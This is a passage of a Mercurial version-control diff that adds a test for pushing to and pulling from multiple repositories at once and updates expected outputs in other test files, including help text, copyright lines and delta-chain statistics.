('mercurial.util', '{}'), ('mercurial.utils.dateutil', '{}'), ('mercurial.utils.stringutil', '{}'), + ('mercurial.utils.urlutil', '{}'), ('tests.drawdag', '{}'), ('tests.test-run-tests', '{}'), ('tests.test-url', "{'optionflags': 4}"), diff --git a/tests/test-exchange-multi-source.t b/tests/test-exchange-multi-source.t new file mode 100644 --- /dev/null +++ b/tests/test-exchange-multi-source.t @@ -0,0 +1,613 @@ +==================================================== +Test push/pull from multiple source at the same time +==================================================== + + +Setup +===== + +main repository +--------------- + + $ . $RUNTESTDIR/testlib/common.sh + $ hg init main-repo + $ cd main-repo + $ mkcommit A + $ mkcommit B + $ mkcommit C + $ mkcommit D + $ mkcommit E + $ hg up 'desc(B)' + 0 files updated, 0 files merged, 3 files removed, 0 files unresolved + $ mkcommit F + created new head + $ mkcommit G + $ hg up 'desc(C)' + 1 files updated, 0 files merged, 2 files removed, 0 files unresolved + $ mkcommit H + created new head + $ hg up null --quiet + $ hg log -T '{desc} {rev}\n' --rev 'sort(all(), "topo")' -G + o H 7 + | + | o E 4 + | | + | o D 3 + |/ + o C 2 + | + | o G 6 + | | + | o F 5 + |/ + o B 1 + | + o A 0 + + $ cd .. + +Various other repositories +-------------------------- + + $ hg clone main-repo branch-E --rev 4 -U + adding changesets + adding manifests + adding file changes + added 5 changesets with 5 changes to 5 files + new changesets 4a2df7238c3b:a603bfb5a83e + $ hg clone main-repo branch-G --rev 6 -U + adding changesets + adding manifests + adding file changes + added 4 changesets with 4 changes to 4 files + new changesets 4a2df7238c3b:c521a06b234b + $ hg clone main-repo branch-H --rev 7 -U + adding changesets + adding manifests + adding file changes + added 4 changesets with 4 changes to 4 files + new changesets 4a2df7238c3b:40faebb2ec45 + +Test simple bare operation +========================== + +pull +---- + + $ hg clone main-repo test-repo-bare --rev 0 -U + adding changesets + adding manifests + adding file changes + added 1 changesets with 1 changes to 1 files + new changesets 4a2df7238c3b + + $ hg pull -R test-repo-bare ./branch-E ./branch-G ./branch-H + pulling from ./branch-E + searching for changes + adding changesets + adding manifests + adding file changes + added 4 changesets with 4 changes to 4 files + new changesets 27547f69f254:a603bfb5a83e + (run 'hg update' to get a working copy) + pulling from ./branch-G + searching for changes + adding changesets + adding manifests + adding file changes + added 2 changesets with 2 changes to 2 files (+1 heads) + new changesets 2f3a4c5c1417:c521a06b234b + (run 'hg heads' to see heads, 'hg merge' to merge) + pulling from ./branch-H + searching for changes + adding changesets + adding manifests + adding file changes + added 1 changesets with 1 changes to 1 files (+1 heads) + new changesets 40faebb2ec45 + (run 'hg heads .' to see heads, 'hg merge' to merge) + $ hg log -R test-repo-bare -T '{desc} {rev}\n' --rev 'sort(all(), "topo")' -G + o H 7 + | + | o E 4 + | | + | o D 3 + |/ + o C 2 + | + | o G 6 + | | + | o F 5 + |/ + o B 1 + | + o A 0 + + +push +---- + + $ cp -R ./branch-E ./branch-E-push + $ cp -R ./branch-G ./branch-G-push + $ cp -R ./branch-H ./branch-H-push + $ hg out -G -R test-repo-bare ./branch-E-push ./branch-G-push ./branch-H-push + comparing with ./branch-E-push + searching for changes + comparing with ./branch-G-push + searching for changes + comparing with ./branch-H-push + searching for changes + o changeset: 7:40faebb2ec45 + | tag: tip + | parent: 2:f838bfaca5c7 + | user: test + | date: Thu Jan 01 00:00:00 1970 +0000 + | summary: H + | + | o changeset: 6:c521a06b234b + | | user: test + | | date: Thu Jan 01 00:00:00 1970 +0000 + | | summary: G + | | + | o changeset: 5:2f3a4c5c1417 + | parent: 1:27547f69f254 + | user: test + | date: Thu Jan 01 00:00:00 1970 +0000 + | summary: F + | + | o changeset: 4:a603bfb5a83e + | | user: test + | | date: Thu Jan 01 00:00:00 1970 +0000 + | | summary: E + | | + | o changeset: 3:b3325c91a4d9 + |/ user: test + | date: Thu Jan 01 00:00:00 1970 +0000 + | summary: D + | + o changeset: 2:f838bfaca5c7 + user: test + date: Thu Jan 01 00:00:00 1970 +0000 + summary: C + + $ hg bundle -R test-repo-bare bundle.hg ./branch-E-push ./branch-G-push ./branch-H-push + searching for changes + searching for changes + searching for changes + 6 changesets found + $ hg push --force -R test-repo-bare ./branch-E-push ./branch-G-push ./branch-H-push + pushing to ./branch-E-push + searching for changes + adding changesets + adding manifests + adding file changes + added 3 changesets with 3 changes to 3 files (+2 heads) + pushing to ./branch-G-push + searching for changes + adding changesets + adding manifests + adding file changes + added 4 changesets with 4 changes to 4 files (+2 heads) + pushing to ./branch-H-push + searching for changes + adding changesets + adding manifests + adding file changes + added 4 changesets with 4 changes to 4 files (+2 heads) + $ hg log -R ./branch-E-push -T '{desc} {rev}\n' --rev 'sort(all(), "topo")' -G + o H 7 + | + | o E 4 + | | + | o D 3 + |/ + o C 2 + | + | o G 6 + | | + | o F 5 + |/ + o B 1 + | + o A 0 + + $ hg log -R ./branch-G-push -T '{desc} {rev}\n' --rev 'sort(all(), "topo")' -G + o H 7 + | + | o E 6 + | | + | o D 5 + |/ + o C 4 + | + | o G 3 + | | + | o F 2 + |/ + o B 1 + | + o A 0 + + $ hg log -R ./branch-H-push -T '{desc} {rev}\n' --rev 'sort(all(), "topo")' -G + o G 7 + | + o F 6 + | + | o E 5 + | | + | o D 4 + | | + | | o H 3 + | |/ + | o C 2 + |/ + o B 1 + | + o A 0 + + $ rm -rf ./*-push + +Test operation with a target +============================ + +pull +---- + + $ hg clone main-repo test-repo-rev --rev 0 -U + adding changesets + adding manifests + adding file changes + added 1 changesets with 1 changes to 1 files + new changesets 4a2df7238c3b + +pulling an explicite revision + + $ node_b=`hg log -R main-repo --rev 'desc(B)' -T '{node}'` + $ hg pull -R test-repo-rev ./branch-E ./branch-G ./branch-H --rev $node_b + pulling from ./branch-E + searching for changes + adding changesets + adding manifests + adding file changes + added 1 changesets with 1 changes to 1 files + new changesets 27547f69f254 + (run 'hg update' to get a working copy) + pulling from ./branch-G + no changes found + pulling from ./branch-H + no changes found + $ hg log -R test-repo-rev -T '{desc} {rev}\n' --rev 'sort(all(), "topo")' -G + o B 1 + | + o A 0 + + +pulling a branch head, the branch head resolve to different revision on the +different repositories. + + $ hg pull -R test-repo-rev ./branch-E ./branch-G ./branch-H --rev default + pulling from ./branch-E + searching for changes + adding changesets + adding manifests + adding file changes + added 3 changesets with 3 changes to 3 files + new changesets f838bfaca5c7:a603bfb5a83e + (run 'hg update' to get a working copy) + pulling from ./branch-G + searching for changes + adding changesets + adding manifests + adding file changes + added 2 changesets with 2 changes to 2 files (+1 heads) + new changesets 2f3a4c5c1417:c521a06b234b + (run 'hg heads' to see heads, 'hg merge' to merge) + pulling from ./branch-H + searching for changes + adding changesets + adding manifests + adding file changes + added 1 changesets with 1 changes to 1 files (+1 heads) + new changesets 40faebb2ec45 + (run 'hg heads .' to see heads, 'hg merge' to merge) + $ hg log -R test-repo-rev -T '{desc} {rev}\n' --rev 'sort(all(), "topo")' -G + o H 7 + | + | o E 4 + | | + | o D 3 + |/ + o C 2 + | + | o G 6 + | | + | o F 5 + |/ + o B 1 + | + o A 0 + + +push +---- + +We only push a specific branch with --rev + + $ cp -R ./branch-E ./branch-E-push + $ cp -R ./branch-G ./branch-G-push + $ cp -R ./branch-H ./branch-H-push + $ hg out -G -R test-repo-bare ./branch-E-push ./branch-G-push ./branch-H-push --rev default + comparing with ./branch-E-push + searching for changes + comparing with ./branch-G-push + searching for changes + comparing with ./branch-H-push + searching for changes + no changes found + o changeset: 7:40faebb2ec45 + | tag: tip + | parent: 2:f838bfaca5c7 + | user: test + | date: Thu Jan 01 00:00:00 1970 +0000 + | summary: H + | + o changeset: 2:f838bfaca5c7 + user: test + date: Thu Jan 01 00:00:00 1970 +0000 + summary: C + + $ hg bundle -R test-repo-bare bundle.hg ./branch-E-push ./branch-G-push ./branch-H-push --rev default + searching for changes + searching for changes + searching for changes + 2 changesets found + $ hg push --force -R test-repo-bare ./branch-E-push ./branch-G-push ./branch-H-push --rev default + pushing to ./branch-E-push + searching for changes + adding changesets + adding manifests + adding file changes + added 1 changesets with 1 changes to 1 files (+1 heads) + pushing to ./branch-G-push + searching for changes + adding changesets + adding manifests + adding file changes + added 2 changesets with 2 changes to 2 files (+1 heads) + pushing to ./branch-H-push + searching for changes + no changes found + $ hg log -R ./branch-E-push -T '{desc} {rev}\n' --rev 'sort(all(), "topo")' -G + o H 5 + | + | o E 4 + | | + | o D 3 + |/ + o C 2 + | + o B 1 + | + o A 0 + + $ hg log -R ./branch-G-push -T '{desc} {rev}\n' --rev 'sort(all(), "topo")' -G + o H 5 + | + o C 4 + | + | o G 3 + | | + | o F 2 + |/ + o B 1 + | + o A 0 + + $ hg log -R ./branch-H-push -T '{desc} {rev}\n' --rev 'sort(all(), "topo")' -G + o H 3 + | + o C 2 + | + o B 1 + | + o A 0 + + $ rm -rf ./*-push + +Same push, but the first one is a no-op + + $ cp -R ./branch-E ./branch-E-push + $ cp -R ./branch-G ./branch-G-push + $ cp -R ./branch-H ./branch-H-push + $ hg out -G -R test-repo-bare ./branch-G-push ./branch-H-push ./branch-E-push --rev default + comparing with ./branch-G-push + searching for changes + comparing with ./branch-H-push + searching for changes + no changes found + comparing with ./branch-E-push + searching for changes + o changeset: 7:40faebb2ec45 + | tag: tip + | parent: 2:f838bfaca5c7 + | user: test + | date: Thu Jan 01 00:00:00 1970 +0000 + | summary: H + | + o changeset: 2:f838bfaca5c7 + user: test + date: Thu Jan 01 00:00:00 1970 +0000 + summary: C + + $ hg bundle -R test-repo-bare bundle.hg ./branch-G-push ./branch-H-push ./branch-E-push --rev default + searching for changes + searching for changes + searching for changes + 2 changesets found + $ hg push --force -R test-repo-bare ./branch-G-push ./branch-H-push ./branch-E-push --rev default + pushing to ./branch-G-push + searching for changes + adding changesets + adding manifests + adding file changes + added 2 changesets with 2 changes to 2 files (+1 heads) + pushing to ./branch-H-push + searching for changes + no changes found + pushing to ./branch-E-push + searching for changes + adding changesets + adding manifests + adding file changes + added 1 changesets with 1 changes to 1 files (+1 heads) + $ hg log -R ./branch-E-push -T '{desc} {rev}\n' --rev 'sort(all(), "topo")' -G + o H 5 + | + | o E 4 + | | + | o D 3 + |/ + o C 2 + | + o B 1 + | + o A 0 + + $ hg log -R ./branch-G-push -T '{desc} {rev}\n' --rev 'sort(all(), "topo")' -G + o H 5 + | + o C 4 + | + | o G 3 + | | + | o F 2 + |/ + o B 1 + | + o A 0 + + $ hg log -R ./branch-H-push -T '{desc} {rev}\n' --rev 'sort(all(), "topo")' -G + o H 3 + | + o C 2 + | + o B 1 + | + o A 0 + + $ rm -rf ./*-push + + +Test with --update +================== + +update without conflicts +------------------------ + + $ hg clone main-repo test-repo-update --rev 0 + adding changesets + adding manifests + adding file changes + added 1 changesets with 1 changes to 1 files + new changesets 4a2df7238c3b + updating to branch default + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved + +We update for each pull, so the first on get into a branch independant from the +other and stay there. This is the expected behavior. + + $ hg log -R test-repo-update -T '{desc} {rev}\n' --rev 'sort(all(), "topo")' -G + @ A 0 + + $ hg pull -R test-repo-update ./branch-E ./branch-G ./branch-H --update + pulling from ./branch-E + searching for changes + adding changesets + adding manifests + adding file changes + added 4 changesets with 4 changes to 4 files + new changesets 27547f69f254:a603bfb5a83e + 4 files updated, 0 files merged, 0 files removed, 0 files unresolved + pulling from ./branch-G + searching for changes + adding changesets + adding manifests + adding file changes + added 2 changesets with 2 changes to 2 files (+1 heads) + new changesets 2f3a4c5c1417:c521a06b234b + 0 files updated, 0 files merged, 0 files removed, 0 files unresolved + updated to "a603bfb5a83e: E" + 1 other heads for branch "default" + pulling from ./branch-H + searching for changes + adding changesets + adding manifests + adding file changes + added 1 changesets with 1 changes to 1 files (+1 heads) + new changesets 40faebb2ec45 + 0 files updated, 0 files merged, 0 files removed, 0 files unresolved + updated to "a603bfb5a83e: E" + 2 other heads for branch "default" + $ hg log -R test-repo-update -T '{desc} {rev}\n' --rev 'sort(all(), "topo")' -G + o H 7 + | + | @ E 4 + | | + | o D 3 + |/ + o C 2 + | + | o G 6 + | | + | o F 5 + |/ + o B 1 + | + o A 0 + + +update with conflicts +--------------------- + + $ hg clone main-repo test-repo-conflict --rev 0 + adding changesets + adding manifests + adding file changes + added 1 changesets with 1 changes to 1 files + new changesets 4a2df7238c3b + updating to branch default + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved + +The update has conflict and interrupt the pull. + + $ echo this-will-conflict > test-repo-conflict/D + $ hg add -R test-repo-conflict test-repo-conflict/D + $ hg log -R test-repo-conflict -T '{desc} {rev}\n' --rev 'sort(all(), "topo")' -G + @ A 0 + + $ hg pull -R test-repo-conflict ./branch-E ./branch-G ./branch-H --update + pulling from ./branch-E + searching for changes + adding changesets + adding manifests + adding file changes + added 4 changesets with 4 changes to 4 files + new changesets 27547f69f254:a603bfb5a83e + merging D + warning: conflicts while merging D! (edit, then use 'hg resolve --mark') + 3 files updated, 0 files merged, 0 files removed, 1 files unresolved + use 'hg resolve' to retry unresolved file merges + [1] + $ hg -R test-repo-conflict resolve -l + U D + $ hg log -R test-repo-conflict -T '{desc} {rev}\n' --rev 'sort(all(), "topo")' -G + @ E 4 + | + o D 3 + | + o C 2 + | + o B 1 + | + % A 0 + diff --git a/tests/test-extension.t b/tests/test-extension.t --- a/tests/test-extension.t +++ b/tests/test-extension.t @@ -676,7 +676,7 @@ Mercurial Distributed SCM (version *) (glob) (see https://mercurial-scm.org for more information) - Copyright (C) 2005-* Matt Mackall and others (glob) + Copyright (C) 2005-* Olivia Mackall and others (glob) This is free software; see the source for copying conditions. There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. @@ -1555,7 +1555,7 @@ Mercurial Distributed SCM (version *) (glob) (see https://mercurial-scm.org for more information) - Copyright (C) 2005-* Matt Mackall and others (glob) + Copyright (C) 2005-* Olivia Mackall and others (glob) This is free software; see the source for copying conditions. There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. @@ -1566,7 +1566,7 @@ Mercurial Distributed SCM (version *) (glob) (see https://mercurial-scm.org for more information) - Copyright (C) 2005-* Matt Mackall and others (glob) + Copyright (C) 2005-* Olivia Mackall and others (glob) This is free software; see the source for copying conditions. There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. @@ -1580,7 +1580,7 @@ Mercurial Distributed SCM (version *) (glob) (see https://mercurial-scm.org for more information) - Copyright (C) 2005-* Matt Mackall and others (glob) + Copyright (C) 2005-* Olivia Mackall and others (glob) This is free software; see the source for copying conditions. There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. @@ -1642,7 +1642,7 @@ Mercurial Distributed SCM (version 3.5.2) (see https://mercurial-scm.org for more information) - Copyright (C) 2005-* Matt Mackall and others (glob) + Copyright (C) 2005-* Olivia Mackall and others (glob) This is free software; see the source for copying conditions. There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. diff --git a/tests/test-fix.t b/tests/test-fix.t --- a/tests/test-fix.t +++ b/tests/test-fix.t @@ -1106,14 +1106,13 @@ $ printf "foo\n" > foo.changed $ hg commit -Aqm "foo" - $ hg debugobsolete `hg parents --template '{node}'` - 1 new obsolescence markers - obsoleted 1 changesets + $ hg ci --amend -m rewritten $ hg --hidden fix -r 0 abort: fixing obsolete revision could cause divergence [255] $ hg --hidden fix -r 0 --config experimental.evolution.allowdivergence=true + 2 new content-divergent changesets $ hg cat -r tip foo.changed FOO diff --git a/tests/test-generaldelta.t b/tests/test-generaldelta.t --- a/tests/test-generaldelta.t +++ b/tests/test-generaldelta.t @@ -106,22 +106,33 @@ 3 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg -R repo debugdeltachain -m rev chain# chainlen prev delta size rawsize chainsize ratio lindist extradist extraratio - 0 1 1 -1 base 104 135 104 0.77037 104 0 0.00000 - 1 1 2 0 prev 57 135 161 1.19259 161 0 0.00000 - 2 1 3 1 prev 57 135 218 1.61481 218 0 0.00000 + 0 1 1 -1 base 104 135 104 0.77037 104 0 0.00000 (no-zstd !) + 1 1 2 0 prev 57 135 161 1.19259 161 0 0.00000 (no-zstd !) + 2 1 3 1 prev 57 135 218 1.61481 218 0 0.00000 (no-zstd !) + 0 1 1 -1 base 107 135 107 0.79259 107 0 0.00000 (zstd !) + 1 1 2 0 prev 57 135 164 1.21481 164 0 0.00000 (zstd !) + 2 1 3 1 prev 57 135 221 1.63704 221 0 0.00000 (zstd !) 3 2 1 -1 base 104 135 104 0.77037 104 0 0.00000 $ hg -R usegd debugdeltachain -m rev chain# chainlen prev delta size rawsize chainsize ratio lindist extradist extraratio - 0 1 1 -1 base 104 135 104 0.77037 104 0 0.00000 - 1 1 2 0 p1 57 135 161 1.19259 161 0 0.00000 - 2 1 3 1 prev 57 135 218 1.61481 218 0 0.00000 - 3 1 2 0 p1 57 135 161 1.19259 275 114 0.70807 + 0 1 1 -1 base 104 135 104 0.77037 104 0 0.00000 (no-zstd !) + 1 1 2 0 p1 57 135 161 1.19259 161 0 0.00000 (no-zstd !) + 2 1 3 1 prev 57 135 218 1.61481 218 0 0.00000 (no-zstd !) + 3 1 2 0 p1 57 135 161 1.19259 275 114 0.70807 (no-zstd !) + 0 1 1 -1 base 107 135 107 0.79259 107 0 0.00000 (zstd !) + 1 1 2 0 p1 57 135 164 1.21481 164 0 0.00000 (zstd !) + 2 1 3 1 prev 57 135 221 1.63704 221 0 0.00000 (zstd !) + 3 1 2 0 p1 57 135 164 1.21481 278 114 0.69512 (zstd !) $ hg -R full debugdeltachain -m rev chain# chainlen prev delta size rawsize chainsize ratio lindist extradist extraratio - 0 1 1 -1 base 104 135 104 0.77037 104 0 0.00000 - 1 1 2 0 p1 57 135 161 1.19259 161 0 0.00000 - 2 1 2 0 p1 57 135 161 1.19259 218 57 0.35404 - 3 1 2 0 p1 57 135 161 1.19259 275 114 0.70807 + 0 1 1 -1 base 104 135 104 0.77037 104 0 0.00000 (no-zstd !) + 1 1 2 0 p1 57 135 161 1.19259 161 0 0.00000 (no-zstd !) + 2 1 2 0 p1 57 135 161 1.19259 218 57 0.35404 (no-zstd !) + 3 1 2 0 p1 57 135 161 1.19259 275 114 0.70807 (no-zstd !) + 0 1 1 -1 base 107 135 107 0.79259 107 0 0.00000 (zstd !) + 1 1 2 0 p1 57 135 164 1.21481 164 0 0.00000 (zstd !) + 2 1 2 0 p1 57 135 164 1.21481 221 57 0.34756 (zstd !) + 3 1 2 0 p1 57 135 164 1.21481 278 114 0.69512 (zstd !) Test revlog.optimize-delta-parent-choice @@ -142,9 +153,12 @@ $ hg commit -q -m merge $ hg debugdeltachain -m rev chain# chainlen prev delta size rawsize chainsize ratio lindist extradist extraratio - 0 1 1 -1 base 59 215 59 0.27442 59 0 0.00000 - 1 1 2 0 prev 61 86 120 1.39535 120 0 0.00000 - 2 1 2 0 p2 62 301 121 0.40199 182 61 0.50413 + 0 1 1 -1 base 59 215 59 0.27442 59 0 0.00000 (no-zstd !) + 1 1 2 0 prev 61 86 120 1.39535 120 0 0.00000 (no-zstd !) + 2 1 2 0 p2 62 301 121 0.40199 182 61 0.50413 (no-zstd !) + 0 1 1 -1 base 68 215 68 0.31628 68 0 0.00000 (zstd !) + 1 1 2 0 prev 70 86 138 1.60465 138 0 0.00000 (zstd !) + 2 1 2 0 p2 68 301 136 0.45183 206 70 0.51471 (zstd !) $ hg strip -q -r . --config extensions.strip= @@ -154,9 +168,12 @@ $ hg commit -q -m merge --config storage.revlog.optimize-delta-parent-choice=yes $ hg debugdeltachain -m rev chain# chainlen prev delta size rawsize chainsize ratio lindist extradist extraratio - 0 1 1 -1 base 59 215 59 0.27442 59 0 0.00000 - 1 1 2 0 prev 61 86 120 1.39535 120 0 0.00000 - 2 1 2 0 p2 62 301 121 0.40199 182 61 0.50413 + 0 1 1 -1 base 59 215 59 0.27442 59 0 0.00000 (no-zstd !) + 1 1 2 0 prev 61 86 120 1.39535 120 0 0.00000 (no-zstd !) + 2 1 2 0 p2 62 301 121 0.40199 182 61 0.50413 (no-zstd !) + 0 1 1 -1 base 68 215 68 0.31628 68 0 0.00000 (zstd !) + 1 1 2 0 prev 70 86 138 1.60465 138 0 0.00000 (zstd !) + 2 1 2 0 p2 68 301 136 0.45183 206 70 0.51471 (zstd !) Test that strip bundle use bundle2 $ hg --config extensions.strip= strip . @@ -267,12 +284,17 @@ 46 3 29 45 p1 58 1334 1671 1.25262 1671 0 0.00000 47 3 30 46 p1 58 1380 1729 1.25290 1729 0 0.00000 48 3 31 47 p1 58 1426 1787 1.25316 1787 0 0.00000 - 49 4 1 -1 base 197 316 197 0.62342 197 0 0.00000 - 50 4 2 49 p1 58 362 255 0.70442 255 0 0.00000 - 51 4 3 50 prev 356 594 611 1.02862 611 0 0.00000 - 52 4 4 51 p1 58 640 669 1.04531 669 0 0.00000 + 49 4 1 -1 base 197 316 197 0.62342 197 0 0.00000 (no-zstd !) + 50 4 2 49 p1 58 362 255 0.70442 255 0 0.00000 (no-zstd !) + 51 4 3 50 prev 356 594 611 1.02862 611 0 0.00000 (no-zstd !) + 52 4 4 51 p1 58 640 669 1.04531 669 0 0.00000 (no-zstd !) + 49 4 1 -1 base 205 316 205 0.64873 205 0 0.00000 (zstd !) + 50 4 2 49 p1 58 362 263 0.72652 263 0 0.00000 (zstd !) + 51 4 3 50 prev 366 594 629 1.05892 629 0 0.00000 (zstd !) + 52 4 4 51 p1 58 640 687 1.07344 687 0 0.00000 (zstd !) 53 5 1 -1 base 0 0 0 0.00000 0 0 0.00000 - 54 6 1 -1 base 369 640 369 0.57656 369 0 0.00000 + 54 6 1 -1 base 369 640 369 0.57656 369 0 0.00000 (no-zstd !) + 54 6 1 -1 base 375 640 375 0.58594 375 0 0.00000 (zstd !) $ hg clone --pull source-repo --config experimental.maxdeltachainspan=2800 relax-chain --config format.generaldelta=yes requesting all changes adding changesets @@ -333,12 +355,17 @@ 46 3 29 45 p1 58 1334 1671 1.25262 1671 0 0.00000 47 3 30 46 p1 58 1380 1729 1.25290 1729 0 0.00000 48 3 31 47 p1 58 1426 1787 1.25316 1787 0 0.00000 - 49 4 1 -1 base 197 316 197 0.62342 197 0 0.00000 - 50 4 2 49 p1 58 362 255 0.70442 255 0 0.00000 - 51 2 13 17 p1 58 594 739 1.24411 2781 2042 2.76319 - 52 5 1 -1 base 369 640 369 0.57656 369 0 0.00000 + 49 4 1 -1 base 197 316 197 0.62342 197 0 0.00000 (no-zstd !) + 50 4 2 49 p1 58 362 255 0.70442 255 0 0.00000 (no-zstd !) + 51 2 13 17 p1 58 594 739 1.24411 2781 2042 2.76319 (no-zstd !) + 52 5 1 -1 base 369 640 369 0.57656 369 0 0.00000 (no-zstd !) + 49 4 1 -1 base 205 316 205 0.64873 205 0 0.00000 (zstd !) + 50 4 2 49 p1 58 362 263 0.72652 263 0 0.00000 (zstd !) + 51 2 13 17 p1 58 594 739 1.24411 2789 2050 2.77402 (zstd !) + 52 5 1 -1 base 375 640 375 0.58594 375 0 0.00000 (zstd !) 53 6 1 -1 base 0 0 0 0.00000 0 0 0.00000 - 54 7 1 -1 base 369 640 369 0.57656 369 0 0.00000 + 54 7 1 -1 base 369 640 369 0.57656 369 0 0.00000 (no-zstd !) + 54 7 1 -1 base 375 640 375 0.58594 375 0 0.00000 (zstd !) $ hg clone --pull source-repo --config experimental.maxdeltachainspan=0 noconst-chain --config format.usegeneraldelta=yes --config storage.revlog.reuse-external-delta-parent=no requesting all changes adding changesets @@ -404,4 +431,5 @@ 51 2 13 17 p1 58 594 739 1.24411 2642 1903 2.57510 52 2 14 51 p1 58 640 797 1.24531 2700 1903 2.38770 53 4 1 -1 base 0 0 0 0.00000 0 0 0.00000 - 54 5 1 -1 base 369 640 369 0.57656 369 0 0.00000 + 54 5 1 -1 base 369 640 369 0.57656 369 0 0.00000 (no-zstd !) + 54 5 1 -1 base 375 640 375 0.58594 375 0 0.00000 (zstd !) diff --git a/tests/test-git-interop.t b/tests/test-git-interop.t --- a/tests/test-git-interop.t +++ b/tests/test-git-interop.t @@ -1,4 +1,4 @@ -#require pygit2 +#require pygit2 no-windows Setup: $ GIT_AUTHOR_NAME='test'; export GIT_AUTHOR_NAME @@ -14,6 +14,7 @@ > git commit "$@" >/dev/null 2>/dev/null || echo "git commit error" > count=`expr $count + 1` > } + $ git config --global init.defaultBranch master $ hg version -v --config extensions.git= | grep '^[E ]' @@ -28,9 +29,9 @@ $ hg status abort: repository specified git format in .hg/requires but has no .git directory [255] + $ git config --global init.defaultBranch master $ git init Initialized empty Git repository in $TESTTMP/nogit/.git/ - $ git config --global init.defaultBranch master This status invocation shows some hg gunk because we didn't use `hg init --git`, which fixes up .git/info/exclude for us. $ hg status diff --git a/tests/test-globalopts.t b/tests/test-globalopts.t --- a/tests/test-globalopts.t +++ b/tests/test-globalopts.t @@ -65,6 +65,8 @@ -R with path aliases: +TODO: add rhg support for path aliases +#if no-rhg $ cd c $ hg -R default identify 8580ff50825a tip @@ -75,6 +77,7 @@ $ HOME=`pwd`/../ hg -R relativetohome identify 8580ff50825a tip $ cd .. +#endif #if no-outer-repo @@ -215,6 +218,8 @@ $ hg --cwd c --config paths.quuxfoo=bar paths | grep quuxfoo > /dev/null && echo quuxfoo quuxfoo +TODO: add rhg support for detailed exit codes +#if no-rhg $ hg --cwd c --config '' tip -q abort: malformed --config option: '' (use --config section.name=value) [10] @@ -230,6 +235,7 @@ $ hg --cwd c --config .b= tip -q abort: malformed --config option: '.b=' (use --config section.name=value) [10] +#endif Testing --debug: @@ -264,7 +270,7 @@ Testing --traceback: -#if no-chg +#if no-chg no-rhg $ hg --cwd c --config x --traceback id 2>&1 | grep -i 'traceback' Traceback (most recent call last): Traceback (most recent call last): (py3 !) @@ -351,6 +357,7 @@ addremove add all new files, delete all missing files files list tracked files forget forget the specified files on the next commit + purge removes files not tracked by Mercurial remove remove the specified files on the next commit rename rename files; equivalent of copy + remove resolve redo merges or set/view the merge status of files @@ -483,6 +490,7 @@ addremove add all new files, delete all missing files files list tracked files forget forget the specified files on the next commit + purge removes files not tracked by Mercurial remove remove the specified files on the next commit rename rename files; equivalent of copy + remove resolve redo merges or set/view the merge status of files diff --git a/tests/test-graft.t b/tests/test-graft.t --- a/tests/test-graft.t +++ b/tests/test-graft.t @@ -223,10 +223,6 @@ committing changelog updating the branch cache grafting 5:97f8bfe72746 "5" - all copies found (* = to merge, ! = divergent, % = renamed and deleted): - on local side: - src: 'c' -> dst: 'b' - checking for directory renames resolving manifests branchmerge: True, force: True, partial: False ancestor: 4c60f11aa304, local: 6b9e5368ca4e+, remote: 97f8bfe72746 @@ -240,10 +236,6 @@ $ HGEDITOR=cat hg graft 4 3 --log --debug scanning for duplicate grafts grafting 4:9c233e8e184d "4" - all copies found (* = to merge, ! = divergent, % = renamed and deleted): - on local side: - src: 'c' -> dst: 'b' - checking for directory renames resolving manifests branchmerge: True, force: True, partial: False ancestor: 4c60f11aa304, local: 1905859650ec+, remote: 9c233e8e184d diff --git a/tests/test-help-hide.t b/tests/test-help-hide.t --- a/tests/test-help-hide.t +++ b/tests/test-help-hide.t @@ -55,6 +55,7 @@ addremove add all new files, delete all missing files files list tracked files forget forget the specified files on the next commit + purge removes files not tracked by Mercurial remove remove the specified files on the next commit rename rename files; equivalent of copy + remove resolve redo merges or set/view the merge status of files @@ -191,6 +192,7 @@ addremove add all new files, delete all missing files files list tracked files forget forget the specified files on the next commit + purge removes files not tracked by Mercurial remove remove the specified files on the next commit rename rename files; equivalent of copy + remove resolve redo merges or set/view the merge status of files diff --git a/tests/test-help.t b/tests/test-help.t --- a/tests/test-help.t +++ b/tests/test-help.t @@ -107,6 +107,7 @@ addremove add all new files, delete all missing files files list tracked files forget forget the specified files on the next commit + purge removes files not tracked by Mercurial remove remove the specified files on the next commit rename rename files; equivalent of copy + remove resolve redo merges or set/view the merge status of files @@ -235,6 +236,7 @@ addremove add all new files, delete all missing files files list tracked files forget forget the specified files on the next commit + purge removes files not tracked by Mercurial remove remove the specified files on the next commit rename rename files; equivalent of copy + remove resolve redo merges or set/view the merge status of files @@ -375,8 +377,6 @@ mq manage a stack of patches notify hooks for sending email push notifications patchbomb command to send changesets as (a series of) patch emails - purge command to delete untracked files from the working - directory relink recreates hardlinks between repository clones schemes extend schemes with shortcuts to repository swarms share share a common history between several working directories @@ -575,7 +575,7 @@ Mercurial Distributed SCM (version *) (glob) (see https://mercurial-scm.org for more information) - Copyright (C) 2005-* Matt Mackall and others (glob) + Copyright (C) 2005-* Olivia Mackall and others (glob) This is free software; see the source for copying conditions. There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. @@ -1069,6 +1069,7 @@ debugsetparents manually set the parents of the current working directory (DANGEROUS) + debugshell run an interactive Python interpreter debugsidedata dump the side data for a cl/manifest/file revision debugssl test a secure connection to a server @@ -1832,7 +1833,7 @@ These symbolic names can be used from the command line. To pull from "my_server": 'hg pull my_server'. To push to "local_path": 'hg push - local_path'. + local_path'. You can check 'hg help urls' for details about valid URLs. Options containing colons (":") denote sub-options that can influence behavior for that specific path. Example: @@ -1841,6 +1842,9 @@ my_server = https://example.com/my_path my_server:pushurl = ssh://example.com/my_path + Paths using the 'path://otherpath' scheme will inherit the sub-options + value from the path they point to. + The following sub-options can be defined: "pushurl" @@ -2720,6 +2724,13 @@ set or show the current phase name </td></tr> <tr><td> + <a href="/help/purge"> + purge + </a> + </td><td> + removes files not tracked by Mercurial + </td></tr> + <tr><td> <a href="/help/recover"> recover </a> diff --git a/tests/test-hg-parseurl.py b/tests/test-hg-parseurl.py --- a/tests/test-hg-parseurl.py +++ b/tests/test-hg-parseurl.py @@ -2,44 +2,48 @@ 